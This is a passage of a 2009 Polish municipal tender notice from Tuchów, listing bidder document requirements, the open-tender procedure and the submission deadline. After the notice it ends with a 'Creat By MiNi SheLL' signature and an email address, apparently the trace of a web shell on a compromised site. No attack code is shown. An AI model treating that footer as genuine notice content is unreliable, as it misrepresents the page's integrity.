- polisy  lub  innego  dokumentu  ubezpieczenia  potwierdzającego, że  wykonawca  jest  ubezpieczony od odpowiedzialności cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  

Załączniki  do  formularza  ofertowego, będące  częścią  oferty, muszą  być  podpisane  bądź  przez  ww. osoby,    bądź  przez  upoważnionego  Wykonawcę ,w  tym  przypadku  upoważnienie  do  podpisania  dokumentów  musi  być  bezwzględnie  dołączone  do  oferty.

Brak  jakichkolwiek z  wyżej  wymienionych  dokumentów, lub  złożenie  dokumentu  w  niewłaściwej  formie  np.  nie  poświadczenie którejkolwiek  strony  dokumentu  przez  wykonawcę  za  zgodność  z  oryginałem,    odpisy  lub  kopie, stwierdzenia  braku  podpisów  bądź  upoważnienia  do  podpisywania  dokumentów, Wykonawca  zostanie  wykluczony i  spowoduje  odrzucenie  oferty.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

1.nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument  wystawiony  nie  wcześniej    niż  6  m-cy  przed upływem  terminu  składania  ofert
2.nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument  wystawiony  nie  wcześniej     niż   6  m-cy  przed  upływem  terminu  składania  ofert
3.nie zalega z uiszczeniem podatków, opłat,  składek na ubezpieczenie społeczne lub zdrowotne albo uzyskał przewidziane prawem zwolnienie, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu.- dokument  wystawiony  nie  wcześniej   niż  3  m-ce  przed upływem  terminu  składania  ofert  

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty, o których mowa powyżej należy złożyć w formie oryginału, odpisu, wypisu lub kopii, przetłumaczone na język polski, poświadczonych przez polskie placówki konsularne, stosownie do obowiązujących przepisów.

Dokumenty sporządzone w języku obcym, inne niż określone   powyżej  należy składać wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego. 

 Ocena  spełnienia  warunków  wymaganych  od  wykonawców  zostanie  dokonana  wg.  formuły /spełnia - nie spełnia/	 

Nie  spełnienie  chociażby  jednego  warunku  w  pkt.  18  i  19  SIWZ  będzie  skutkować   wykluczeniem  wykonawcy i odrzuceniem  oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow /Zamówienia  publiczne+ogłoszenia/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1, pokój nr 1
Cena  materiałów  przetargowych  wynosi  50,00 złotych - wersja papierowa u Zamawiającego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2009 godzina 10:00, miejsce: Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1, pokój nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com